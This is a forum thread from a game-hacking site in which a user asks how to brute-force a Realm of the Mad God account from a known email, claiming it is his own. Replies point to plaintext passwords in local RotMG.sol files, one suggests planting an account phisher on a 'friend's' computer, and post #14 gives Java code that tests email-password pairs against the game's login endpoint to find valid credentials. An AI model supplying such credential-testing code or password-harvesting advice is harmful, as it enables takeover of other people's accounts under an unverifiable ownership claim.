Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › MultiPlayer Game Hacks & Cheats › Realm of the Mad God Hacks & Cheats › Realm of the Mad God Help & Requests › Assistance with brute force?

Assistance with brute force?

Posts 1–15 of 23 · Page 1 of 2
DR
drakansteal3
Assistance with brute force?
Hey I know the email I need to get the password for, but i am genuinely stuck on where to go from that. I've heard that brute force is the way to go to get someone's password, and I've looked around and can't find what I require.

So my question to you is, can someone please give me a short, simple, step-by-step guide to brute forcing an account with a known email? Thanks.
#1 · 12y ago
DR
drakansteal3
Oh nononono it's not for stealing accounts don't worry, it's for my own account "Drakan". I died on my main and I haven't accessed this account for a year so I've forgot the password but I know which email address it uses......... and I forgot the password to that email haha.

EDIT: I know I have some stuff on that account that could help me out.
#2 · edited 12y ago · 12y ago
cehrenr
cehrenr
Search your user directory (ie, C:\Users\YOURPCNAME\AppData\.." for RotMG.sol, open them all in a text editor and see if any of them have your user/password. They're stored in plain text so as long as you haven't logged into another account since then it should still be there.
#3 · 12y ago
DR
drakansteal3
I've never used that account on the current computer I am using. And I have used another account since, my main.
#4 · 12y ago
cehrenr
cehrenr
Quote Originally Posted by drakansteal3 View Post
I've never used that account on the current computer I am using. And I have used another account since, my main.
Then you're shit out of luck. Unless you have a "friend" who "used that account" on "his computer" - then build an account phisher and put it on his PC.
#5 · 12y ago
Zasx
Zasx
You know, there's a Forgot Password button on the login screen.
But obviously you don't remember the email credentials too.

Assuming it is really your account
#6 · 12y ago
DR
drakansteal3
Of course I don't have email credentials (as I've already stated) because I haven't accessed the thing for just under a year... Why would I want to steal an account that has no characters, not in a guild and no good pets?
#7 · 12y ago
nilly
nilly
#8 · 12y ago
JU
JustAnoobROTMG
Quote Originally Posted by drakansteal3 View Post
Of course I don't have email credentials (as I've already stated) because I haven't accessed the thing for just under a year... Why would I want to steal an account that has no characters, not in a guild and no good pets?
Because its a mule account with tops or life pots ?

Why do we have to trust you? No offense but you can find a bad account on realmeye, says its yours and you want to hack it when your real target is a starred account with characters and stuff..

I changed my mind and (just in case ) i was ready to give you the same answers than ceh.
After all the "Rotmg.sol" trick is not a secret.

Sadly, it seems you are stuck.
If only you've used muledump, or at least kept the emails registered in an email software.

Wait..maybe .... Does your browser remember email+passwords? It may remember your email and its own password..
#9 · 12y ago
Zasx
Zasx
Quote Originally Posted by JustAnoobROTMG View Post
you can find a bad account on realmeye, says its yours and you want to hack it when your real target is a starred account with characters and stuff
Dis.

/10char
#10 · edited 12y ago · 12y ago
DR
drakansteal3
Thanks for your help, those that did. It's clear nobody is willing to assist me even though I would say the fact the account's name is my other name (I use drakan, drakowns, drakansteal and drakansteal3). Mule dump wasn't around when I last activated the account - Nor was realmeye (I think). And as I've previously stated, I haven't accessed the account on this computer.
#11 · 12y ago
CrazyJani
CrazyJani
Quote Originally Posted by drakansteal3 View Post
Mule dump wasn't around when I last activated the account
Muledump is quite old actually (compared to the age of RotMG)
#12 · 12y ago
JU
JustAnoobROTMG
Quote Originally Posted by drakansteal3 View Post
Thanks for your help, those that did. It's clear nobody is willing to assist me.
ceh did, i tried to..

If you dont have the rotmg credentials or the related email credential,and cant recover them we cant help you..
One is stored in flash cookies, the other may be stored by your browser if you logged to the email webpage (or in your email software).
Those are viable method to find them. You cant means you are screwed :/

We are not magicians, btw .
#13 · 12y ago
IZ
IziLife
It's actually pretty easy to bruteforce an account

Code:
        	public void checkCred(String email, String pass) {
        	    try {
        	        String urlBuild = "http://www.realmofthemadgod.com/char/list?guid=" + email + "&password=" + pass;
        	        URL url = new URL(urlBuild);

        	        // read text returned by server
        	        BufferedReader in = new BufferedReader(new InputStreamReader(url.openStream()));


        	        String line;
        	        while ((line = in .readLine()) != null) {

        	            if (line.indexOf("<Error>") >= 0) {
        	                ToConsole("Not Found!");

        	            } else {
        	                ToConsole("Found!");
        	                ToConsole("Mail:" + email);
        	                ToConsole("Pass:" + pass);

        	            }
        	        }

        	        in .close();

        	    } catch (IOException e) {
        	        // TODO Auto-generated catch block
        	        e.printStackTrace();
        	    }

        	}
#14 · edited 12y ago · 12y ago
nilly
nilly
It's funny, with the time wasted trying to brute an account you could of farmed those items and then some.
#15 · 12y ago
Posts 1–15 of 23 · Page 1 of 2

Post a Reply

Similar Threads

  • What exactly is Brute Forcing and what can u crack with brute forcing?By sk80rjustdie in General Hacking
    6Last post 12y ago
  • Legal/Practical advice with regards to Brute-Forcing passwordsBy kicknickr in Minecraft Help
    5Last post 12y ago
  • How to brute force a account (with a know email)By 105424 in Realm of the Mad God Hacks & Cheats
    8Last post 14y ago
  • brute force crackingBy ace76543 in Spammers Corner
    2Last post 20y ago
  • How To Brute ForceBy Flawless in Game Hacking Tutorials
    0Last post 20y ago

Tags for this Thread

#brute#force#god#mad#password#realm